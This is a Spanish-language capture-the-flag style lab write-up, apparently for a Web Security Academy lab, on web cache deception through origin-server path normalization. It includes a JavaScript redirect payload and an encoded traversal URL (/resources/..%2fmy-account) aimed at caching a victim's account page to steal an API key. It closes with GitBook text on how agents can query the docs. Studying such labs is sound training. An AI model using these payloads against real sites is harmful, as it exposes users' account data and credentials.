> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/web-cache-deception/web-cache-deception-via-origin-server-normalization.md).

# Engaño de caché web mediante normalización del lado del servidor de origen

### Explotación de la normalización del servidor de origen para el engaño de caché web

#### Objetivo del laboratorio

Recupera la \*\*clave API\*\* del usuario **carlos** abusando de un **caché** comportamiento provocado por la normalización de la URL por el **servidor original**.

#### Acceso

* Conexión posible con: **wiener:peter**
* El laboratorio proporciona una lista de delimitadores (lista de delimitadores), pero aquí el ataque se basa principalmente en `../` y la codificación.

### 1) Observación

* En el **`/resources`** directorio, hay un **caché**.
* La idea es, por tanto, pasar una página sensible (**`/my-account`**) como recurso "cacheable", utilizando una **ruta de recorrido** que será **normalizada** por el servidor original.

<figure><img src="/files/5c661cd7b8007da89095a85d9b0a38ba6ba35f66" alt=""><figcaption></figcaption></figure>

Ejemplo probado:

```bash
/resources/../my-account
```

<figure><img src="/files/d63e5bcfb138be054622901891eca9504b46a4ba" alt=""><figcaption></figcaption></figure>

### 2) Explotación

#### Idea

1. Obliga a la víctima a cargar una URL que comience con **`/resources/`** (para activar la caché).
2. Vuelve a **`/my-account`** vía `../` (o su variante codificada).
3. Almacena la respuesta en la caché bajo una clave y luego recupera la página oculta.

{% code overflow="wrap" %}

```javascript
<script>
document.location = "https://0ad700ba030812cd804d126b00d800a7.web-security-academy.net/resources/../my-account/?jordan";
</script>
```

{% endcode %}

Según tus pruebas: **no funciona** en este estado

<figure><img src="/files/2fcc75da06f39fbd165a7e5d44724503da10aee8" alt=""><figcaption></figcaption></figure>

### 3) Contorneo: Codificar el backend

Indicas que necesitas **codificar en URL** el separador para que la normalización original funcione correctamente.

URL utilizada:

```bash
/resources/..%2fmy-account?jordan
```

Carga útil final :

```javascript
<script>
document.location = "https://0ad700ba030812cd804d126b00d800a7.web-security-academy.net/resources/..%2fmy-account?jordan";
</script>
```

Resultado: el servidor **interpreta** la URL como se esperaba (normalización), permitiendo continuar el ataque de caché

<figure><img src="/files/051fadf65362b03a414a4f63924623ff784e2db7" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/web-cache-deception/web-cache-deception-via-origin-server-normalization.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
